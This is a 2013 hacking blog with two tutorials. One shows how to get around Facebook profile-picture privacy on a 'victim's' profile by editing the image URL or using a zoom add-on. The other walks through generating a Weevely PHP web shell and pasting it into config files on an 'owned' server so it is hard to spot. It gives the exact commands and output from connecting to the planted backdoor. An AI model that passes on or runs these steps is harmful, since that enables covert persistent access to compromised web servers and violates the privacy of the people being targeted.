Sunday, 8 September 2013

How To Bypass Privacy Of Facebook Profile Picture


In this tutorial, i will show you that how to bypass Facebook privacy and watch full profile picture of any profile.
We have two methods to see full profile picture of our victim and both are given below.

1- By Editing Profile Picture URL
2- Thumbnail Zoom Plus Addon of Firefox

1- By Editing Profile Picture URL:

1- Open profile of the victim.
2- Right click on his/her profile picture and click on "copy image location".
3- Open new tab in your browser and paste the URL in it. URL will look something like this:
https://fbcdn-profile-a.akamaihd.net/hprofile-ak-prn2/c95.2.320.320/s160x160/XXXXXXXXXXXXXXXXXXXXXX.jpg
fb privacy bypass by editing image location

4- Now from that URL, we need to remove size parameters. In above URL, blue text is showing all sizing parameters. Remove them from URL and now your URL will become something like this:
https://fbcdn-profile-a.akamaihd.net/hprofile-ak-prn2/XXXXXXXXXXXXXXXXXXXXXX.jpg
5- Now just place this URL in your browser, press enter and enjoy full profile picture of your victim.

2- Thumbnail Zoom Plus Addon of Firefox:

In this method, you need Mozilla Firefox browser and its addon thumbnail zoom plus.
After getting these two things, follow me step by step:

1- Open Mozilla Firefox and browse to victim's profile.
2- Move your pointer over profile picture of victim, thumbnail zoom plus will pop-up full image of the victim in a new box.
fb privacy bypassing with thumbnail zoom plus
Note:
Sometimes, you won't be able to see full picture.
So, in that case:
1- Click over cover photo of victim.
2- Now when you are on the cover photo page, move your mouse over profile picture. It will show you enlarged image in a new box.

fb profile pic bypass using thumbnail zoom

Monday, 2 September 2013

How To Backdoor A WebServer Using Weevely PHP Backdoor

backdoor a server using weevely backdoor

In this tutorial, i will show you how to use weevely PHP backdoor to backdoor an apache webserver. You can use this method to backdoor any webserver running PHP on it.

Note:  
Weevely PHP backdoor is very stealthy. It will reside in the page that we will backdoor, but it will be hard to detect. Moreover password protection feature make it more secure from backdooring prospective.

First you need to install weevely on your machine.

Download weevely

Now if you are on Windows OS then follow my tutorial "How to install weevely web-backdoor tool on Windows". For linux users, its simple . Just download it and run it with python.

Now lets start backdooring procedure.

1- Open terminal or cmd and run weevely to verify that it working.

CMD: weevely.py
Terminal: ./weevely.py

Note: 
I will show this tutorial accoding to linux environment. Windows users must replace ./weevely.py with weevely.py to make it working in windows.

Output:
      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell

[+] Start ssh-like terminal session
    weevely <url> <password>

[+] Run command directly from command line
    weevely <url> <password> [ "<command> .." | :<module> .. ] 

[+] Restore a saved session file
    weevely session [ <file> ]

[+] Generate PHP backdoor
    weevely generate <password> [ <path> ] ..

[+] Show credits
    weevely credits
   
[+] Show available module and backdoor generators
    weevely help

2- Now run weevely generate command to generate a PHP backdoor.

./weevely.py generate exploiter_zee ~/Desktop/backdoor.php

Output:

[generate.php] Backdoor file '/home/exploiter/Desktop/backdoor.php' created with password 'exploiter_zee'

3- Now generated backdoor is available on our provided path. Open it with some text editor and copy all code of this backdoor.php. Now go back to your owned server and open some file that you want to backdoor. For example, i want to backdoor config.php, config.inc.php, connection.php etc. Now open each file and paste this code at the end or start of that PHP file.(I would recommend pasting at the end of file, because it will make your injected backdoor a little bit anonymous).

4- Now server is backdoored. Lets test it with our weevely tool. Open termial or cmd and connect to those backdoored files using following weevely command.

./weevely http://site.com/config.php exploiter_zee

Output:
      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell

[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/telekomxchange.net/config.session'

[shell.php] [!] Error: No response
hostan@:/home1/hostan/public_html $

Brief Explanation:
In above command we are trying to connect to config.php file that we just a moment ago backdoored and exploiter_zee is password of our backdoor.